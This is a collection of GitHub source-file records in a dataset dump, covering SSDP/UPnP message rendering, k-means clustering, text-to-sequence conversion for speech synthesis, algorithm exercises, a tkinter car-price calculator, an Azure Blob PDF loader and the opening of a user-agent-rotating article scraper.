\"\"}\r\n\r\ndef renderAliveMessages(device, maxAge, root=True, headers=ALIVE_HEADERS):\r\n\tmessages = []\r\n\tif root:\r\n\t\theaders[\"CACHE-CONTROL\"] = \"max-age=%d\" % maxAge\r\n\t\theaders[\"LOCATION\"] = device.location\r\n\t\theaders[\"SERVER\"] = getUserAgent()\r\n\t\theaders[\"BOOTID.UPNP.ORG\"] = device.bootId\r\n\t\theaders[\"CONFIGID.UPNP.ORG\"] = device.configId\r\n\t\t\r\n\t\theaders[\"NT\"] = \"upnp:rootdevice\"\r\n\t\theaders[\"USN\"] = \"uuid:%s::upnp:rootdevice\" % device.uuid\r\n\t\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\theaders[\"NT\"] = \"uuid:%s\" % device.uuid\r\n\theaders[\"USN\"] = \"uuid:%s\" % device.uuid\r\n\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\theaders[\"NT\"] = \"urn:%s\" % device.urn\r\n\theaders[\"USN\"] = \"uuid:%s::urn:%s\" % (device.uuid, device.urn)\r\n\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\tfor child in device.devices:\r\n\t\tmessages.extend(renderAliveMessages(child, maxAge, False, headers))\r\n\t\t\r\n\tfor service in device.services:\r\n\t\theaders[\"NT\"] = \"urn:%s\" % service.urn\r\n\t\theaders[\"USN\"] = \"uuid:%s::urn:%s\" % (device.uuid, service.urn)\r\n\t\tmessages.append(renderMessage(NOTIFY_METHOD, headers))\r\n\t\t\r\n\treturn messages\r\n\r\ndef renderDeadMessages(device, maxAge):\r\n\tpass\r\n\r\ndef renderUpdateMessages(device, maxAge):\r\n\tpass\r\n\r\ndef renderSearchResponseMessages(device, maxAge, searchTarget, t=time.gmtime()):\r\n\tpass\r\n\r\ndef renderSearchMessage(maxAge, searchTarget):\r\n\tpass\r\n\r\ndef _renderHeaders(headers):\r\n\tHEADER_FORMAT = \"%s: %s\"\r\n\treturn \"\\r\\n\".join([HEADER_FORMAT % header for header in headers.items()])\r\n\r\nclass _Message(object):\r\n\t\r\n\tdef __init__(self, method, headers):\r\n\t\tself._method = method\r\n\t\tself._headers = headers\r\n\t\r\n\tdef render(self):\r\n\t\treturn self._method + \"\\r\\n\" + _renderHeaders(self._headers) + \"\\r\\n\"\r\n
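# Editor's note (added; illustrative only): with the message classes below, SearchMessage(2, \"ssdp:all\").render() yields the standard UPnP discovery request \"M-SEARCH * HTTP/1.1\" followed by the header lines HOST: 239.255.255.250:1900, MAN: \"ssdp:discover\", MX: 2 and ST: ssdp:all.\r\n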
\r\nclass _NotifyMessage(_Message):\r\n\tdef __init__(self, headers):\r\n\t\t_Message.__init__(self, \"NOTIFY * HTTP/1.1\", headers)\r\n\r\nclass SearchMessage(_Message):\r\n\tdef __init__(self, mx, st):\r\n\t\t_Message.__init__(self, \"M-SEARCH * HTTP/1.1\",\r\n\t\t\t\t\t\t OrderedDict([(\"HOST\", \"%s:%d\" % ADDRESS),\r\n\t\t\t\t\t\t\t (\"MAN\", \"\\\"ssdp:discover\\\"\"),\r\n\t\t\t\t\t\t\t (\"MX\", str(mx)),\r\n\t\t\t\t\t\t\t (\"ST\", str(st))]))\r\n\r\nclass ResponseMessage(_Message):\r\n\tdef __init__(self, maxAge, location, st, usn, t=None):\r\n\t\tif t is None:\r\n\t\t\tt = time.gmtime()\r\n\t\theaders = OrderedDict([(\"CACHE-CONTROL\", \"max-age=\" + str(maxAge)),\r\n\t\t\t\t\t\t\t (\"DATE\", formatDate(t)),\r\n\t\t\t\t\t\t\t (\"EXT\", \"\"),\r\n\t\t\t\t\t\t\t (\"LOCATION\", str(location)),\r\n\t\t\t\t\t\t\t (\"SERVER\", USER_AGENT),\r\n\t\t\t\t\t\t\t (\"ST\", str(st)),\r\n\t\t\t\t\t\t\t (\"USN\", str(usn)),\r\n\t\t\t\t\t\t\t (\"BOOTID.UPNP.ORG\", str(BOOT_ID)),\r\n\t\t\t\t\t\t\t (\"CONFIGID.UPNP.ORG\", str(CONFIG_ID))])\r\n\t\tif SEARCH_PORT is not None:\r\n\t\t\theaders[\"SEARCHPORT.UPNP.ORG\"] = str(SEARCH_PORT)\r\n\t\t\t\r\n\t\t_Message.__init__(self, \"HTTP/1.1 200 OK\", headers)\r\n\r\nclass AliveMessage(_NotifyMessage):\r\n\tdef __init__(self, maxAge, location, nt, usn):\r\n\t\theaders = OrderedDict([(\"HOST\", \"%s:%d\" % ADDRESS),\r\n\t\t\t\t\t\t\t (\"CACHE-CONTROL\", \"max-age=%d\" % maxAge),\r\n\t\t\t\t\t\t\t (\"LOCATION\", str(location)),\r\n\t\t\t\t\t\t\t (\"NT\", str(nt)),\r\n\t\t\t\t\t\t\t (\"NTS\", \"ssdp:alive\"),\r\n\t\t\t\t\t\t\t (\"SERVER\", USER_AGENT),\r\n\t\t\t\t\t\t\t (\"USN\", str(usn)),\r\n\t\t\t\t\t\t\t (\"BOOTID.UPNP.ORG\", str(BOOT_ID)),\r\n\t\t\t\t\t\t\t (\"CONFIGID.UPNP.ORG\", str(CONFIG_ID))])\r\n\t\tif SEARCH_PORT is not None:\r\n\t\t\theaders[\"SEARCHPORT.UPNP.ORG\"] = str(SEARCH_PORT)\r\n\t\t\r\n\t\t_NotifyMessage.__init__(self, headers)\r\n\r\nclass UpdateMessage(_NotifyMessage):\r\n\tpass\r\n\r\nclass DeadMessage(_NotifyMessage):\r\n\tpass","repo_name":"jonathanherbst/pyDLNA","sub_path":"SSDP.py","file_name":"SSDP.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"43365138819","text":"from datetime import datetime\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef dist(a, b):\n    \"\"\"\n    Compute the Euclidean distance between two points\n\n    :param a: type: ndarray\n    :param b: type: ndarray\n    :return: Euclidean distance computed as ||a-b||\n    :raise ValueError: If the two arrays have different shapes\n    \"\"\"\n    if a.shape != b.shape:\n        raise ValueError\n    return np.sqrt(np.sum(np.square(a - b)))\n\n\ndef get_cluster(arr, centroids):\n    \"\"\"\n    Assign arr to one of the clusters based on\n    least distance to cluster centroid\n    :param arr: type: (d,) ndarray\n    :param centroids: type: k x d ndarray\n        Cluster centroids. Each centroid must have the same shape as arr\n    :return: the index of the cluster that arr should be assigned to\n    \"\"\"\n    min_dist = float('inf')\n    assigned = None\n    for idx, c in enumerate(centroids):\n        d = dist(arr, c)\n        if d < min_dist:\n            min_dist = d\n            assigned = idx\n\n    return assigned\n\n\ndef recompute_centroids(X, c, centroids):\n    \"\"\"\n    Recompute the centroids of each cluster to be the mean of the data points\n    in the cluster\n    :param X: data points\n    :param c: cluster assignments\n    :param centroids: matrix of centroids\n    :return: new matrix of centroids\n    \"\"\"\n    new_centroids = []\n    for i in range(len(centroids)):\n        mask = c == i\n        mask = mask.astype(np.float32).reshape(1, c.shape[0])\n        c_n = np.count_nonzero(mask)\n        new_c = np.sum(np.matmul(mask, X), axis=0) / c_n\n        new_centroids.append(new_c)\n\n    return np.asarray(new_centroids, dtype=np.float32)\n\n\ndef check_converging(c, new_c, eps):\n    \"\"\"\n    Returns True if any centroid moved by more than eps (i.e. has not yet converged)\n    :param c: previous centroid\n    :param new_c: new centroid\n    :param eps: maximum movement between the previous and new centroid\n        for them to be considered converged\n    :return: type: bool\n    \"\"\"\n    diff = np.sqrt(np.sum(np.square(c - new_c), 1))\n    return not np.all(diff <= eps)\n\n\ndef initialize_centroids(X, k):\n    \"\"\"\n    Initialize k centroids from the given X\n    :param X: Data points\n    :param k: number of clusters\n    :return: Matrix of centroids\n    \"\"\"\n    centroids = []\n    # Choose initial centroid randomly\n    np.random.seed(int(datetime.now().timestamp()))\n    c_idx = np.random.randint(X.shape[0])\n    centroids.append(X[c_idx])\n\n    # Calculate the square of Euclidean distance between each data point\n    # and the chosen initial centroid. This would be used as a weighted\n    # probability distribution to choose the subsequent centroids. 
This approach\n    # ensures that the chosen initial centroids are far away from each other.\n    D_x = np.sum(np.square(X - centroids[0]), 1).reshape(X.shape[0])\n    D_x = D_x / np.sum(D_x)\n    for _ in range(1, k):\n        c_idx = np.random.choice(X.shape[0], p=D_x)\n        centroids.append(X[c_idx])\n\n    centroids = np.asarray(centroids, dtype=np.float32)\n\n    return centroids\n\n\ndef do_clustering(X, k):\n    \"\"\"\n    Do K-Means Clustering to assign each data point in X to one of k clusters\n    :param X: Data points\n    :param k: number of clusters expected\n    :return: the centroids for each cluster and the assignments for the data pts\n    \"\"\"\n    eps = 0.0003\n    centroids = initialize_centroids(X, k)\n\n    iteration = 0\n    centroids_not_converged = True\n    cluster_assignment = np.full(X.shape[0], -1, dtype=np.int8)\n    while centroids_not_converged:\n        for idx, x in enumerate(X):\n            cluster_assignment[idx] = get_cluster(x, centroids)\n\n        new_centroids = recompute_centroids(X, cluster_assignment, centroids)\n        centroids_not_converged = check_converging(centroids, new_centroids,\n                                                   eps)\n        centroids = new_centroids\n        iteration += 1\n\n    print(\"Clustering outcome:\")\n    print(np.unique(cluster_assignment, return_counts=True))\n    visualize_clustering(X, cluster_assignment)\n\n    return centroids, cluster_assignment\n\n\ndef visualize_clustering(X, c):\n    \"\"\"\n    Visualize the cluster assignment of the data points in X after running\n    K-Means clustering\n    :param X: N x D matrix that contains N D-dimensional data points\n    :param c: N dimensional vector that contains the cluster assignment of each data point\n    \"\"\"\n    fig = plt.figure()\n    ax = Axes3D(fig)\n\n    for i, config in enumerate([('r', 'o'), ('b', '^')]):\n        mask = c == i\n        pts = X[mask,:]\n        ax.scatter(pts[:, -3], pts[:, -2], pts[:, -1], c=config[0], marker=config[1])\n\n    ax.set_xlabel('L')\n    ax.set_ylabel('a')\n    ax.set_zlabel('b')\n\n    plt.show()\n","repo_name":"chenxukun/xukunnachi","sub_path":"KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"72160370713","text":"\"\"\" from https://github.com/keithito/tacotron \"\"\"\nfrom text import cleaners\nfrom text.symbols import symbols, cleaner_symbols\n\n# Base mappings\n_symbol_to_id = {s: i for i, s in enumerate(symbols)}\n_id_to_symbol = {i: s for i, s in enumerate(symbols)}\n\ndef _update_symbols(cleaner_name):\n    \"\"\" Update symbols based on cleaner \"\"\"\n    global _symbol_to_id, _id_to_symbol\n    if cleaner_name in cleaner_symbols:\n        choice_symbols = cleaner_symbols[cleaner_name]\n        current_symbols = [choice_symbols['_pad']] + list(choice_symbols['_punctuation']) + list(choice_symbols['_letters'])\n        _symbol_to_id = {s: i for i, s in enumerate(current_symbols)}\n        _id_to_symbol = {i: s for i, s in enumerate(current_symbols)}\n\ndef text_to_sequence(text, cleaner_names):\n    '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.'''\n    sequence = []\n    clean_text = _clean_text(text, cleaner_names)\n\n    # Update symbols for the current cleaner\n    # if cleaner_names:\n    #     _update_symbols(cleaner_names[0])\n\n    for symbol in clean_text:\n        if symbol not in _symbol_to_id.keys():\n            continue\n        symbol_id = _symbol_to_id[symbol]\n        sequence += [symbol_id]\n    return sequence\n\n\ndef cleaned_text_to_sequence(cleaned_text):\n    '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.\n    Args:\n        text: string to convert to a sequence\n    Returns:\n        List of integers corresponding to the symbols in the text\n    '''\n    sequence = [_symbol_to_id[symbol] for symbol in cleaned_text if symbol in _symbol_to_id.keys()]\n    return sequence\n
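# Editor's note (added; illustrative only): the two tables round-trip, i.e. sequence_to_text(cleaned_text_to_sequence(s)) == s (sequence_to_text is defined below) whenever every character of s appears in symbols.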
\n\ndef sequence_to_text(sequence):\n    '''Converts a sequence of IDs back to a string'''\n    result = ''\n    for symbol_id in sequence:\n        s = _id_to_symbol[symbol_id]\n        result += s\n    return result\n\n\ndef _clean_text(text, cleaner_names):\n    for name in cleaner_names:\n        cleaner = getattr(cleaners, name)\n        if not cleaner:\n            raise Exception('Unknown cleaner: %s' % name)\n        text = cleaner(text)\n    for char in text:\n        if char not in symbols:\n            text = text.replace(char, '')\n    return text\n","repo_name":"Roista57/vits-webui","sub_path":"text/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"}
{"seq_id":"814936809","text":"\"\"\"\nThis solution doesn't pass one of the performance tests.\n\"\"\"\ndef solution(A):\n    if len(A) <= 1:\n        return 0\n    deltas = [y - x for x, y in zip(A[:-1], A[1:])]\n    return max(max_profit(deltas), 0)\n\n\ndef max_profit(A):\n    value, _, _ = max_slice(A, 0, len(A)-1)\n    return value\n\n\ndef max_slice(A, p, q):\n    if p == q:\n        return A[p], p, q\n    \n    m = (p + q)//2\n    l_sum, l_start, l_end = max_slice(A, p, m)\n    r_sum, r_start, r_end = max_slice(A, m+1, q)\n    m_sum, m_start, m_end = max_crossing_slice(A, p, m, q)\n    \n    best = max(l_sum, r_sum, m_sum)\n    if best == l_sum:\n        return l_sum, l_start, l_end\n    elif best == r_sum:\n        return r_sum, r_start, r_end\n    else:\n        return m_sum, m_start, m_end\n\n\ndef max_crossing_slice(A, p, m, q):\n    left_sum, left_index = float('-inf'), None\n    curr = 0\n    for i in range(m, p-1, -1):\n        curr += A[i]\n        if curr > left_sum:\n            left_sum = curr\n            left_index = i\n    right_sum, right_index = float('-inf'), None\n    curr = 0\n    for j in range(m+1, q+1):\n        curr += A[j]\n        if curr > right_sum:\n            right_sum = curr\n            right_index = j\n    return (left_sum + right_sum), left_index, right_index\n\nif __name__ == '__main__':\n    assert solution([23171, 21011, 21123, 21013, 21367]) == 356\n\n","repo_name":"devforfu/codility","sub_path":"maxprofit2.py","file_name":"maxprofit2.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"18889221657","text":"\"\"\"\n    Given a sequence of n integers a1, a2, ..., an, a 132 pattern is a subsequence ai, aj, ak such that i < j < k and ai < ak < aj. 
Design an algorithm that takes a list of n numbers as input and checks whether there is a 132 pattern in the list.\n\nNote: n will be less than 15,000.\n\nExample 1:\n\nInput: [1, 2, 3, 4]\n\nOutput: False\n\nExplanation: There is no 132 pattern in the sequence.\n\nExample 2:\n\nInput: [3, 1, 4, 2]\n\nOutput: True\n\nExplanation: There is a 132 pattern in the sequence: [1, 4, 2].\n\nExample 3:\n\nInput: [-1, 3, 2, 0]\n\nOutput: True\n\nExplanation: There are three 132 patterns in the sequence: [-1, 3, 2], [-1, 3, 0] and [-1, 2, 0].\n\n\"\"\"\nclass Solution(object):\n def find132pattern(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n 1139ms\n \"\"\"\n if len(nums)<=2:\n return False\n temp=nums[0]\n count=0\n start=temp\n end=temp\n for i in nums:\n if i<=temp:\n temp=i\n count+=1\n else:\n start=temp\n break\n # if count==len(nums):\n # return False\n for i in nums[count:]:\n if i>temp:\n temp=i\n count+=1\n else:\n end=temp\n break\n print(count,start,end)\n start_1=start\n end_1=end\n stack=[[start,end]]\n for i in nums[count:]:\n for j in stack:\n if i>j[0] and i= i:\n start_1 = i\n if i > start_1:\n end_1 = i\n if stack[-1][0]>end_1:\n stack.append([start_1, end_1])\n else:\n while len(stack)>0:\n a=stack.pop()\n if a[1]>=end_1 or len(stack)==0:\n stack.append([start_1, max(end_1,a[1])])\n break\n print(i,stack)\n return False\n\n def find132pattern_1(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n 69ms\n \"\"\"\n n = len(nums)\n sta = []\n a2 = -2 ** 31\n for i in range(n - 1, -1, -1):\n if nums[i] < a2:\n return True\n if not sta or sta[-1] >= nums[i]:\n sta.append(nums[i])\n else:\n while sta and sta[-1] < nums[i]:\n a2 = sta.pop()\n sta.append(nums[i])\n return False\n\n def find132pattern_2(self, nums):\n \"\"\"\n 66ms\n :param nums:\n :return:\n \"\"\"\n if len(nums) < 3:\n return False\n\n stack = [[nums[0], nums[0]]]\n minimum = nums[0]\n for num in nums[1:]:\n if num <= minimum:\n minimum = num\n else:\n while stack and num > stack[-1][0]:\n if num < stack[-1][1]:\n return True\n else:\n stack.pop()\n stack.append([minimum, num])\n\n return False\n\n def find132pattern_4(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n 68ms\n \"\"\"\n if len(nums)<=2:\n return False\n temp=nums[0]\n count=0\n start=temp\n end=temp\n for i in nums:\n if i<=temp:\n temp=i\n count+=1\n else:\n start=temp\n break\n # if count==len(nums):\n # return False\n for i in nums[count:]:\n if i>temp:\n temp=i\n count+=1\n else:\n end=temp\n break\n stack=[[start,end]]\n minm=start\n for i in nums[count:]:\n if i<=minm:\n minm=i\n else:\n while stack and i > stack[-1][0]:\n a = stack.pop()\n if i < a[1]:\n return True\n stack.append([minm, i])\n print(stack)\n return False\n\n\n# nums=[0,0,-1,-2,-1,0,1,1,-3,-3,4,4,2]\n# print(Solution().find132pattern(nums))\n#\n# nums=[0,1,2,3,4,5]\n# print(Solution().find132pattern(nums))\n#\n# nums=[0,-1,-2,-3,-4,-5]\n# print(Solution().find132pattern(nums))\n\nnums=[8,10,4,6,1,11,3,5]\nprint(Solution().find132pattern_4(nums))\n\nnums=[8,10,4,6,5]\nprint(Solution().find132pattern_4(nums))\n\nnums=[3, 1, 4, 2]\nprint(Solution().find132pattern_4(nums))\n\nnums=[2,3,1,2]\nprint(Solution().find132pattern_4(nums))","repo_name":"953250587/leetcode-python","sub_path":"OneTwoThreePattern_MID_456.py","file_name":"OneTwoThreePattern_MID_456.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39697186539","text":"\r\nimport tkinter as 
tk\r\n\r\ndef calculate_price():\r\n    selected_car = car_var.get()\r\n    selected_feature = feature_var.get()\r\n\r\n    if selected_car == \"Ford\":\r\n        if selected_feature == \"çelik jant\":\r\n            price = 800000 + 20000\r\n        elif selected_feature == \"sunroof\":\r\n            price = 800000 + 30000\r\n        elif selected_feature == \"ses sistemi\":\r\n            price = 800000 + 15000\r\n        elif selected_feature == \"kablosuz şarj\":\r\n            price = 800000 + 5000\r\n        else:\r\n            price = 800000\r\n\r\n    elif selected_car == \"BMW\":\r\n        if selected_feature == \"çelik jant\":\r\n            price = 1800000 + 40000\r\n        elif selected_feature == \"sunroof\":\r\n            price = 1800000 + 45000\r\n        elif selected_feature == \"ses sistemi\":\r\n            price = 1800000 + 25000\r\n        elif selected_feature == \"kablosuz şarj\":\r\n            price = 1800000 + 10000\r\n        else:\r\n            price = 1800000\r\n\r\n    elif selected_car == \"Audi\":\r\n        if selected_feature == \"çelik jant\":\r\n            price = 2000000 + 70000\r\n        elif selected_feature == \"sunroof\":\r\n            price = 2000000 + 75000\r\n        elif selected_feature == \"ses sistemi\":\r\n            price = 2000000 + 55000\r\n        elif selected_feature == \"kablosuz şarj\":\r\n            price = 2000000 + 20000\r\n        else:\r\n            price = 2000000\r\n\r\n    price_label.config(text=\"Fiyat: {} TL\".format(price))\r\n\r\nroot = tk.Tk()\r\nroot.title(\"Araç Fiyat Hesaplama sistemi\")\r\n\r\ncar_label = tk.Label(root, text=\"Araç Seçin:\")\r\ncar_label.pack()\r\n\r\ncar_var = tk.StringVar()\r\ncar_choices = [\"Ford\", \"BMW\", \"Audi\"]\r\ncar_dropdown = tk.OptionMenu(root, car_var, *car_choices)\r\ncar_dropdown.pack()\r\n\r\nfeature_label = tk.Label(root, text=\"İlave Özellik Seçin:\")\r\nfeature_label.pack()\r\n\r\nfeature_var = tk.StringVar()\r\nfeature_choices = [\"çelik jant\", \"sunroof\", \"ses sistemi\", \"kablosuz şarj\"]\r\nfeature_dropdown = tk.OptionMenu(root, feature_var, *feature_choices)\r\nfeature_dropdown.pack()\r\n\r\ncalculate_button = tk.Button(root, text=\"Fiyatı Hesapla\", command=calculate_price)\r\ncalculate_button.pack()\r\n\r\nprice_label = tk.Label(root, text=\" Fiyatı: -\")\r\nprice_label.pack()\r\n\r\nroot.mainloop()\r\n","repo_name":"firatgunay/Tkinter","sub_path":"carSelection.py","file_name":"carSelection.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"5369074339","text":"import pandas as pd\nfrom azure.storage.blob import (\n    BlobServiceClient,\n    ContainerClient,\n    StorageStreamDownloader,\n)\nimport os\nimport io\nimport pypdf\nimport re\nimport logging\n\n\nclass AzureBlobStorageDocumentLoader:\n    \"\"\"\n    Class that loads files from blob storage so you can transform those files\n    into a pandas DataFrame.\n\n    Parameters:\n        account_key (str): the storage account key, usually loaded from the environment\n        account_name (str, optional): the name of the azure account\n            Defaults to 'westdraid001'\n        container_name (str, optional): the name of the azure blob container\n            Defaults to 'tests-gpt-neoris'\n        prefix (str, optional): the beginning of the path where you want to search and load the files\n            Defaults to 'EMBEDDINGS_TEST/langchain'\n    \"\"\"\n\n    def __init__(\n        self,\n        account_key: str,\n        account_name: str = \"westdraid001\",\n        container_name: str = \"tests-gpt-neoris\",\n        prefix: str = \"EMBEDDINGS_TEST/langchain\",\n    ):\n        self.account_name = account_name\n        self.account_key = account_key\n        self.container_name = container_name\n        self.prefix = prefix\n\n    def __connect_blob_storage(self) -> ContainerClient:\n        \"\"\"\n        Connects to an Azure Blob Storage container using the provided account credentials.\n\n        This function creates a connection to an Azure Blob Storage container using the\n        specified account name, account key, and container name. It returns a ContainerClient\n        object that can be used to interact with the container.\n\n        Parameters\n        ------------\n        self\n\n        Returns\n        -------\n        ContainerClient:\n            A client object for interacting with the specified container.\n        \"\"\"\n        string_connection = self.__string_connection_blob_storage()\n        service_client = BlobServiceClient.from_connection_string(string_connection)\n        container_client = service_client.get_container_client(self.container_name)\n        logging.info(\"Connection to Container successful\")\n\n        return container_client\n\n    def __string_connection_blob_storage(self) -> str:\n        \"\"\"\n        Generate a connection string for Azure Blob Storage.\n\n        This private method constructs a connection string for Azure Blob Storage using the provided account name and account key.\n\n        Returns:\n            str: A connection string for Azure Blob Storage.\n\n        Example:\n            instance = AzureBlobStorageDocumentLoader(account_name='myaccount', account_key='myaccountkey')\n            connection_string = instance._AzureBlobStorageDocumentLoader__string_connection_blob_storage()\n            print(connection_string)\n            # Output: 'DefaultEndpointsProtocol=https;AccountName=myaccount;AccountKey=myaccountkey;EndpointSuffix=core.windows.net;'\n        \"\"\"\n        string_connection = \"DefaultEndpointsProtocol=https;\"\n        string_connection += f\"AccountName={self.account_name};\"\n        string_connection += f\"AccountKey={self.account_key};\"\n        string_connection += \"EndpointSuffix=core.windows.net;\"\n        return string_connection\n\n    @staticmethod\n    def __retrieve_file_from_blob_storage(\n        container_client: ContainerClient, blob_name: str\n    ) -> StorageStreamDownloader:\n        \"\"\"\n        Retrieve the content of a file from Azure Blob Storage.\n\n        This function retrieves the content of a file stored in Azure Blob Storage\n        using the provided `container_client` and `blob_name`.\n\n        Parameters\n        ----------\n        container_client : azure.storage.blob.ContainerClient\n            A client for the container that holds the blob.\n        blob_name : str\n            The name (path) of the blob to download.\n\n        Returns\n        -------\n        azure.storage.blob.StorageStreamDownloader\n            A StorageStreamDownloader object representing the downloaded file content.\n        \"\"\"\n        blob_client = container_client.get_blob_client(blob_name)\n        blob_content = blob_client.download_blob()\n        return blob_content\n\n    def __create_list_path_blobs(\n        self, blob_container: ContainerClient, ext=None\n    ) -> list:\n        \"\"\"\n        Create a list of file paths for blobs in Azure Blob Storage.\n\n        This function generates a list of file paths for blobs located in the specified\n        `blob_container` and starting with the configured `prefix`. You can optionally\n        provide a list of file extensions to filter the results.\n\n        Parameters\n        ----------\n        self\n        blob_container : azure.storage.blob.ContainerClient\n            A container client instance pointing to the Azure Blob Storage container.\n        ext : list, optional\n            A list of file extensions to filter the results. If not provided, the default\n            extension list [\".pdf\"] will be used.\n\n        Returns\n        -------\n        list\n            A list of file paths for blobs matching the given criteria.\n        \"\"\"\n\n        if ext is None:\n            ext = [\".pdf\"]\n\n        blob_path_files = blob_container.list_blobs(name_starts_with=self.prefix)\n        path_files = [\n            blob.name\n            for blob in blob_path_files\n            if os.path.splitext(blob.name)[-1] in ext\n        ]\n        return path_files\n\n    def __generate_pandas_dataframe_from_blob(\n        self, list_path_blobs: list, blob_container_: ContainerClient\n    ) -> pd.DataFrame:\n        \"\"\"\n        Generate a pandas DataFrame from PDFs stored as blobs in Azure Blob Storage.\n\n        This function reads PDFs stored as blobs in the specified `blob_container_` and\n        extracts information such as the file path, page number, and content. It then\n        creates a pandas DataFrame containing this information.\n\n        Parameters\n        ----------\n        self\n        list_path_blobs : list\n            A list of file paths for the PDF blobs to be processed.\n        blob_container_ : azure.storage.blob.ContainerClient\n            A container client instance pointing to the Azure Blob Storage container.\n\n        Returns\n        -------\n        pd.DataFrame\n            A pandas DataFrame containing information about PDFs, including their file\n            paths, page numbers, and extracted content.\n        \"\"\"\n        list_pdfs = []\n        list_name_path = []\n        list_page = []\n        list_content = []\n        list_index_document = []\n\n        for i, path in enumerate(list_path_blobs):\n            pdf_binary = self.__retrieve_file_from_blob_storage(blob_container_, path)\n            stream = io.BytesIO()\n            pdf_binary.readinto(stream)\n            pdf = pypdf.PdfReader(stream, strict=True)\n            list_pdfs.append((i, pdf))\n\n            # enumerate each page of each file\n            for j, page in enumerate(pdf.pages):\n                list_name_path.append(path)\n                list_page.append(j)\n                list_content.append(page.extract_text())\n                list_index_document.append(i)\n\n        columns_name = [\"name_path\", \"index_document\", \"page\", \"content\"]\n        columns_data = [list_name_path, list_index_document, list_page, list_content]\n        dict_pdf_info = dict(zip(columns_name, columns_data))\n        return pd.DataFrame(dict_pdf_info)\n\n    @staticmethod\n    def clean_content(x: str) -> str:\n        \"\"\"\n        Clean the input text by removing line breaks, strange symbols, and double spaces.\n\n        This function applies regular expressions to the input text in order to remove line\n        breaks, non-alphanumeric characters, and consecutive spaces. It returns the cleaned text.\n\n        Parameters\n        ----------\n        x : str\n            The input text to be cleaned.\n\n        Returns\n        -------\n        str\n            The cleaned text with line breaks, strange symbols, and double spaces removed.\n        \"\"\"\n        x = re.sub(r\"[\\r\\n\\t]+|[^a-zA-Z0-9\\s.,!?_(){}\\[\\]+=\\-/*]+| {2,}\", \"\", x)\n        x = re.sub(r\"\\s+\", \" \", x).strip()\n        x = re.sub(r\". ,\", \"\", x)\n        # collapse duplicated periods and leftover line breaks from the substitutions above\n        x = x.replace(\"..\", \".\")\n        x = x.replace(\". .\", \".\")\n        x = x.replace(\"\\n\", \"\")\n        x = x.strip()\n        return x\n\n    def load_document(self) -> pd.DataFrame:\n        \"\"\"\n        Create a pandas DataFrame with cleaned content from documents stored as blobs.\n\n        This function connects to Azure Blob Storage using the provided credentials and\n        retrieves PDF documents stored as blobs. It generates a pandas DataFrame with\n        information about the documents, including cleaned content.\n\n        Parameters\n        ----------\n        self\n\n        Returns\n        -------\n        pd.DataFrame\n            A pandas DataFrame containing information about documents, including their\n            file paths, page numbers, and cleaned content.\"\"\"\n        blob_container = self.__connect_blob_storage()\n        path_blobs = self.__create_list_path_blobs(blob_container)\n        df = self.__generate_pandas_dataframe_from_blob(path_blobs, blob_container)\n        df[\"content\"] = df.content.apply(lambda x: self.clean_content(x))\n        return df\n
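# Editor's note (added; hypothetical usage sketch, the environment-variable name is a placeholder):\n#   loader = AzureBlobStorageDocumentLoader(account_key=os.environ[\"AZURE_ACCOUNT_KEY\"])\n#   df = loader.load_document()  # one row per PDF page: name_path, index_document, page, content\n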
","repo_name":"Giovanny-Encinia/prompt_enginnering_embedings","sub_path":"load_transform_data/loader_blob_storage.py","file_name":"loader_blob_storage.py","file_ext":"py","file_size_in_byte":9002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
{"seq_id":"34523923797","text":"import random\nimport json\nimport sqlite3\nimport time\nimport datetime\nimport requests\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\nuser_agent_list = [\n    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',\n    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',\n    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',\n    'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1',\n    'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36'\n]\n\nfor i in range(1, 4):\n    user_agent = random.choice(user_agent_list)\nheaders = {'User-Agent': user_agent}\n\nconn = sqlite3.connect('articles.db')\nc = conn.cursor()\n\n# Add terms you want to scrape here\nterms = ['children+military', 'reintegration', 'military+families', 'divorce+military',\n         'spouses+military', 'military+deployments', 'active+duty', 'military+ptsd', 'military+youth', 'military+reintegration', 'service+members+ptsd',\n         'military+veterans', '\\\"war+and+terrorism\\\"', 'military', 'armed+forces', 'military+spouses', 'military+divorce',\n         'military+parenting', 'service+members', 'soldiers', 'airmen', 'marines', 'sailor', 'coast+guardsmen', 'national+guardsmen',\n         'reservists', 'veterans', 'posttraumatic+stress+disorder', 'reserve+component', 'war', 